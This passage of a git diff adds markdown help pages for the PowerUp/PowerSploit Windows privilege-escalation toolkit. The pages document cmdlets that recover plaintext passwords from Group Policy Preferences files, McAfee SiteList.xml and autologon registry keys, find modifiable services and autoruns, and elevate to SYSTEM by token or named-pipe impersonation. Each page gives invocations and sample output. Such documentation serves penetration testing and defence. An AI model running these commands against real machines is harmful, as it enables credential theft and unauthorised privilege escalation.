+Comments: Should work on IIS 6 and Above
+
+## RELATED LINKS
+
+[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
+http://www.netspi.com
+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
+http://www.netspi.com
+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)
+
diff --git a/docs/Privesc/Get-CachedGPPPassword.md b/docs/Privesc/Get-CachedGPPPassword.md new file mode 100755 index 0000000..2169a15 --- /dev/null +++ b/docs/Privesc/Get-CachedGPPPassword.md @@ -0,0 +1,55 @@ +# Get-CachedGPPPassword
+
+## SYNOPSIS
+Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and
+left in cached files on the host.
+
+Author: Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-CachedGPPPassword
+```
+
+## DESCRIPTION
+Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and
+datasources.xml files and returns plaintext passwords.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-CachedGPPPassword
+```
+
+NewName : \[BLANK\]
+Changed : {2013-04-25 18:36:07}
+Passwords : {Super!!!Password}
+UserNames : {SuperSecretBackdoor}
+File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7
+ C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr
+ oups.xml
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
+https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
+http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
+https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
+http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html)
+
diff --git a/docs/Privesc/Get-ModifiablePath.md b/docs/Privesc/Get-ModifiablePath.md new file mode 100755 index 0000000..2a1118f --- /dev/null +++ b/docs/Privesc/Get-ModifiablePath.md @@ -0,0 +1,102 @@ +# Get-ModifiablePath
+
+## SYNOPSIS
+Parses a passed string containing multiple possible file/folder paths and returns
+the file paths where the current user has modification rights.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-ModifiablePath [-Path] <String[]> [-Literal]
+```
+
+## DESCRIPTION
+Takes a complex path specification of an initial file/folder path with possible
+configuration files, 'tokenizes' the string in a number of possible ways, and
+enumerates the ACLs for each path that currently exists on the system.
+Any path that
+the current user has modification rights on is returned in a custom object that contains
+the modifiable path, associated permission set, and the IdentityReference with the specified
+rights.
+The SID of the current user and any group he/she are a part of are used as the
+comparison set against the parsed path DACLs.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath
+```
+
+Path Permissions IdentityReference
+---- ----------- -----------------
+C:\Temp\blah.exe {ReadAttributes, ReadCo...
+NT AUTHORITY\Authentic...
+C:\Temp\config.ini {ReadAttributes, ReadCo...
+NT AUTHORITY\Authentic...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath
+```
+
+Path Permissions IdentityReference
+---- ----------- -----------------
+C:\Vuln\blah.bat {ReadAttributes, ReadCo...
+NT AUTHORITY\Authentic...
+C:\Vuln\config.ini {ReadAttributes, ReadCo...
+NT AUTHORITY\Authentic...
+...
+
+## PARAMETERS
+
+### -Path
+The string path to parse for modifiable files.
+Required
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: FullName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Literal
+Switch.
+Treat all paths as literal (i.e.
+don't do 'tokenization').
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: LiteralPaths
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.TokenPrivilege.ModifiablePath
+
+Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for
+a modifiable path.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-ModifiableRegistryAutoRun.md b/docs/Privesc/Get-ModifiableRegistryAutoRun.md new file mode 100755 index 0000000..23314f9 --- /dev/null +++ b/docs/Privesc/Get-ModifiableRegistryAutoRun.md @@ -0,0 +1,44 @@ +# Get-ModifiableRegistryAutoRun
+
+## SYNOPSIS
+Returns any elevated system autoruns in which the current user can
+modify part of the path string.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ModifiablePath
+
+## SYNTAX
+
+```
+Get-ModifiableRegistryAutoRun
+```
+
+## DESCRIPTION
+Enumerates a number of autorun specifications in HKLM and filters any
+autoruns through Get-ModifiablePath, returning any file/config locations
+in the found path strings that the current user can modify.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ModifiableRegistryAutoRun
+```
+
+Return vulneable autorun binaries (or associated configs).
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ModifiableRegistryAutoRun
+
+Custom PSObject containing results.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-ModifiableScheduledTaskFile.md b/docs/Privesc/Get-ModifiableScheduledTaskFile.md new file mode 100755 index 0000000..4e48cc4 --- /dev/null +++ b/docs/Privesc/Get-ModifiableScheduledTaskFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableScheduledTaskFile
+
+## SYNOPSIS
+Returns scheduled tasks where the current user can modify any file
+in the associated task action string.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ModifiablePath
+
+## SYNTAX
+
+```
+Get-ModifiableScheduledTaskFile
+```
+
+## DESCRIPTION
+Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
+and parses the XML specification for each task, extracting the command triggers.
+Each trigger string is filtered through Get-ModifiablePath, returning any file/config
+locations in the found path strings that the current user can modify.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ModifiableScheduledTaskFile
+```
+
+Return scheduled tasks with modifiable command strings.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ModifiableScheduledTaskFile
+
+Custom PSObject containing results.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-ModifiableService.md b/docs/Privesc/Get-ModifiableService.md new file mode 100755 index 0000000..92eeb81 --- /dev/null +++ b/docs/Privesc/Get-ModifiableService.md @@ -0,0 +1,40 @@ +# Get-ModifiableService
+
+## SYNOPSIS
+Enumerates all services and returns services for which the current user can modify the binPath.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail
+
+## SYNTAX
+
+```
+Get-ModifiableService
+```
+
+## DESCRIPTION
+Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
+the current user has rights to change the service configuration.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ModifiableService
+```
+
+Get a set of potentially exploitable services.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ModifiablePath
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-ModifiableServiceFile.md b/docs/Privesc/Get-ModifiableServiceFile.md new file mode 100755 index 0000000..ab01e42 --- /dev/null +++ b/docs/Privesc/Get-ModifiableServiceFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableServiceFile
+
+## SYNOPSIS
+Enumerates all services and returns vulnerable service files.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath
+
+## SYNTAX
+
+```
+Get-ModifiableServiceFile
+```
+
+## DESCRIPTION
+Enumerates all services by querying the WMI win32_service class.
+For each service,
+it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
+if the current user has rights to modify the service binary itself or any associated
+arguments.
+If the associated binary (or any configuration files) can be overwritten,
+privileges may be able to be escalated.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ModifiableServiceFile
+```
+
+Get a set of potentially exploitable service binares/config files.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ModifiablePath
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-ProcessTokenGroup.md b/docs/Privesc/Get-ProcessTokenGroup.md new file mode 100755 index 0000000..e52533c --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenGroup.md @@ -0,0 +1,114 @@ +# Get-ProcessTokenGroup
+
+## SYNOPSIS
+Returns all SIDs that the current token context is a part of, whether they are disabled or not.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Get-TokenInformation
+
+## SYNTAX
+
+```
+Get-ProcessTokenGroup [[-Id] <UInt32>]
+```
+
+## DESCRIPTION
+First, if a process ID is passed, then the process is opened using OpenProcess(),
+otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.
+OpenProcessToken() is then used to get a handle to the specified process token.
+The token
+is then passed to Get-TokenInformation to query the current token groups for the specified
+token.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ProcessTokenGroup
+```
+
+SID Attributes ProcessId
+--- ---------- ---------
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 1372
+S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 1372
+S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 1372
+S-1-16-8192 1372
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Process notepad | Get-ProcessTokenGroup
+```
+
+SID Attributes ProcessId
+--- ---------- ---------
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 2640
+S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 2640
+S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-5-21-890171859-3433809...
+..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 2640
+S-1-16-8192 2640
+
+## PARAMETERS
+
+### -Id
+The process ID to enumerate token groups for, otherwise defaults to the current process.
+
+```yaml
+Type: UInt32
+Parameter Sets: (All)
+Aliases: ProcessID
+
+Required: False
+Position: 1
+Default value: 0
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.TokenGroup
+
+Outputs a custom object containing the token group (SID/attributes) for the specified token if
+"-InformationClass 'Groups'" is passed.
+
+PowerUp.TokenPrivilege
+
+Outputs a custom object containing the token privilege (name/attributes) for the specified token if
+"-InformationClass 'Privileges'" is passed
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-ProcessTokenPrivilege.md b/docs/Privesc/Get-ProcessTokenPrivilege.md new file mode 100755 index 0000000..9f835f2 --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenPrivilege.md @@ -0,0 +1,131 @@ +# Get-ProcessTokenPrivilege
+
+## SYNOPSIS
+Returns all privileges for the current (or specified) process ID.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Get-TokenInformation
+
+## SYNTAX
+
+```
+Get-ProcessTokenPrivilege [[-Id] <UInt32>] [-Special]
+```
+
+## DESCRIPTION
+First, if a process ID is passed, then the process is opened using OpenProcess(),
+otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.
+OpenProcessToken() is then used to get a handle to the specified process token.
+The token
+is then passed to Get-TokenInformation to query the current privileges for the specified
+token.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ProcessTokenPrivilege
+```
+
+Privilege Attributes ProcessId
+ --------- ---------- ---------
+ SeShutdownPrivilege DISABLED 2600
+ SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2600
+ SeUndockPrivilege DISABLED 2600
+SeIncreaseWorkingSetPrivilege DISABLED 2600
+ SeTimeZonePrivilege DISABLED 2600
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ProcessTokenPrivilege -Special
+```
+
+Privilege Attributes ProcessId
+--------- ---------- ---------
+SeSecurityPrivilege DISABLED 2444
+SeTakeOwnershipPrivilege DISABLED 2444
+SeBackupPrivilege DISABLED 2444
+SeRestorePrivilege DISABLED 2444
+SeSystemEnvironmentPriv...
+DISABLED 2444
+SeImpersonatePrivilege ...T, SE_PRIVILEGE_ENABLED 2444
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-Process notepad | Get-ProcessTokenPrivilege | fl
+```
+
+Privilege : SeShutdownPrivilege
+Attributes : DISABLED
+ProcessId : 2640
+
+Privilege : SeChangeNotifyPrivilege
+Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
+ProcessId : 2640
+
+Privilege : SeUndockPrivilege
+Attributes : DISABLED
+ProcessId : 2640
+
+Privilege : SeIncreaseWorkingSetPrivilege
+Attributes : DISABLED
+ProcessId : 2640
+
+Privilege : SeTimeZonePrivilege
+Attributes : DISABLED
+ProcessId : 2640
+
+## PARAMETERS
+
+### -Id
+The process ID to enumerate token groups for, otherwise defaults to the current process.
+
+```yaml
+Type: UInt32
+Parameter Sets: (All)
+Aliases: ProcessID
+
+Required: False
+Position: 1
+Default value: 0
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Special
+Switch.
+Only return 'special' privileges, meaning admin-level privileges.
+These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege,
+SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Privileged
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.TokenGroup
+
+Outputs a custom object containing the token group (SID/attributes) for the specified token if
+"-InformationClass 'Groups'" is passed.
+
+PowerUp.TokenPrivilege
+
+Outputs a custom object containing the token privilege (name/attributes) for the specified token if
+"-InformationClass 'Privileges'" is passed
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-RegistryAlwaysInstallElevated.md b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md new file mode 100755 index 0000000..ff48afc --- /dev/null +++ b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md @@ -0,0 +1,45 @@ +# Get-RegistryAlwaysInstallElevated
+
+## SYNOPSIS
+Checks if any of the AlwaysInstallElevated registry keys are set.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-RegistryAlwaysInstallElevated
+```
+
+## DESCRIPTION
+Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
+or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
+are set, $False otherwise.
+If one of these keys are set, then all .MSI files run with
+elevated permissions, regardless of current user permissions.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-RegistryAlwaysInstallElevated
+```
+
+Returns $True if any of the AlwaysInstallElevated registry keys are set.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Boolean
+
+$True if RegistryAlwaysInstallElevated is set, $False otherwise.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-RegistryAutoLogon.md b/docs/Privesc/Get-RegistryAutoLogon.md new file mode 100755 index 0000000..b93e75c --- /dev/null +++ b/docs/Privesc/Get-RegistryAutoLogon.md @@ -0,0 +1,44 @@ +# Get-RegistryAutoLogon
+
+## SYNOPSIS
+Finds any autologon credentials left in the registry.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-RegistryAutoLogon
+```
+
+## DESCRIPTION
+Checks if any autologon accounts/credentials are set in a number of registry locations.
+If they are, the credentials are extracted and returned as a custom PSObject.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-RegistryAutoLogon
+```
+
+Finds any autologon credentials left in the registry.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.RegistryAutoLogon
+
+Custom PSObject containing autologin credentials found in the registry.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb)
+
diff --git a/docs/Privesc/Get-ServiceDetail.md b/docs/Privesc/Get-ServiceDetail.md new file mode 100755 index 0000000..ac758b0 --- /dev/null +++ b/docs/Privesc/Get-ServiceDetail.md @@ -0,0 +1,65 @@ +# Get-ServiceDetail
+
+## SYNOPSIS
+Returns detailed information about a specified service by querying the
+WMI win32_service class for the specified service name.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-ServiceDetail [-Name] <String[]>
+```
+
+## DESCRIPTION
+Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on
+the pipeline object returned by Get-Service, extracts out the service name, queries the
+WMI win32_service class for the specified service for details like binPath, and outputs
+everything.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ServiceDetail -Name VulnSVC
+```
+
+Gets detailed information about the 'VulnSVC' service.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Get-ServiceDetail
+```
+
+Gets detailed information about the 'VulnSVC' service.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to query information for.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Management.ManagementObject
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Get-SiteListPassword.md b/docs/Privesc/Get-SiteListPassword.md new file mode 100755 index 0000000..1ebbb5b --- /dev/null +++ b/docs/Privesc/Get-SiteListPassword.md @@ -0,0 +1,96 @@ +# Get-SiteListPassword
+
+## SYNOPSIS
+Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
+Based on Jerome Nokin (@funoverip)'s Python solution (in links).
+
+Author: Jerome Nokin (@funoverip)
+PowerShell Port: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-SiteListPassword [[-Path] <String[]>]
+```
+
+## DESCRIPTION
+Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
+C:\Documents and Settings\, or C:\Users\.
+For any files found, the appropriate
+credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
+function that takes advantage of McAfee's static key encryption.
+Any decrypted credentials
+are output in custom objects.
+See links for more information.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-SiteListPassword
+```
+
+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+UserName :
+Path : Products/CommonUpdater
+Name : McAfeeHttp
+DecPassword : MyStrongPassword!
+Enabled : 1
+DomainName :
+Server : update.nai.com:80
+
+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+UserName : McAfeeService
+Path : Repository$
+Name : Paris
+DecPassword : MyStrongPassword!
+Enabled : 1
+DomainName : companydomain
+Server : paris001
+
+EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+UserName : McAfeeService
+Path : Repository$
+Name : Tokyo
+DecPassword : MyStrongPassword!
+Enabled : 1
+DomainName : companydomain
+Server : tokyo000
+
+## PARAMETERS
+
+### -Path
+Optional path to a SiteList.xml file or folder.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.SiteListPassword
+
+## NOTES
+
+## RELATED LINKS
+
+[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
+https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
+https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
+https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
+https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
+https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
+https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf)
+
diff --git a/docs/Privesc/Get-System.md b/docs/Privesc/Get-System.md new file mode 100755 index 0000000..bcaf3d6 --- /dev/null +++ b/docs/Privesc/Get-System.md @@ -0,0 +1,172 @@ +# Get-System
+
+## SYNOPSIS
+GetSystem functionality inspired by Meterpreter's getsystem.
+'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create
+a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.
+NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure
+token duplication works correctly.
+
+PowerSploit Function: Get-System
+Author: @harmj0y, @mattifestation
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### NamedPipe (Default)
+```
+Get-System [-Technique <String>] [-ServiceName <String>] [-PipeName <String>]
+```
+
+### Token
+```
+Get-System [-Technique <String>]
+```
+
+### RevToSelf
+```
+Get-System [-RevToSelf]
+```
+
+### WhoAmI
+```
+Get-System [-WhoAmI]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-System
+```
+
+Uses named impersonate to elevate the current thread token to SYSTEM.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
+```
+
+Uses named impersonate to elevate the current thread token to SYSTEM
+with a custom service and pipe name.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-System -Technique Token
+```
+
+Uses token duplication to elevate the current thread token to SYSTEM.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-System -WhoAmI
+```
+
+Displays the credentials for the current thread.
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Get-System -RevToSelf
+```
+
+Reverts the current thread privileges.
+
+## PARAMETERS
+
+### -Technique
+The technique to use, 'NamedPipe' or 'Token'.
+
+```yaml
+Type: String
+Parameter Sets: NamedPipe, Token
+Aliases:
+
+Required: False
+Position: Named
+Default value: NamedPipe
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServiceName
+The name of the service used with named pipe impersonation, defaults to 'TestSVC'.
+
+```yaml
+Type: String
+Parameter Sets: NamedPipe
+Aliases:
+
+Required: False
+Position: Named
+Default value: TestSVC
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PipeName
+The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.
+
+```yaml
+Type: String
+Parameter Sets: NamedPipe
+Aliases:
+
+Required: False
+Position: Named
+Default value: TestSVC
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RevToSelf
+Reverts the current thread privileges.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: RevToSelf
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WhoAmI
+Switch.
+Display the credentials for the current PowerShell thread.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: WhoAmI
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
+https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
+http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
+https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
+http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/)
+
diff --git a/docs/Privesc/Get-UnattendedInstallFile.md b/docs/Privesc/Get-UnattendedInstallFile.md new file mode 100755 index 0000000..8927520 --- /dev/null +++ b/docs/Privesc/Get-UnattendedInstallFile.md @@ -0,0 +1,44 @@ +# Get-UnattendedInstallFile
+
+## SYNOPSIS
+Checks several locations for remaining unattended installation files,
+which may have deployment credentials.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-UnattendedInstallFile
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-UnattendedInstallFile
+```
+
+Finds any remaining unattended installation files.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.UnattendedInstallFile
+
+Custom PSObject containing results.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)
+
diff --git a/docs/Privesc/Get-UnquotedService.md b/docs/Privesc/Get-UnquotedService.md new file mode 100755 index 0000000..4b61355 --- /dev/null +++ b/docs/Privesc/Get-UnquotedService.md @@ -0,0 +1,45 @@ +# Get-UnquotedService
+
+## SYNOPSIS
+Get-UnquotedService Returns the name and binary path for services with unquoted paths
+that also have a space in the name.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission
+
+## SYNTAX
+
+```
+Get-UnquotedService
+```
+
+## DESCRIPTION
+Uses Get-WmiObject to query all win32_service objects and extract out
+the binary pathname for each.
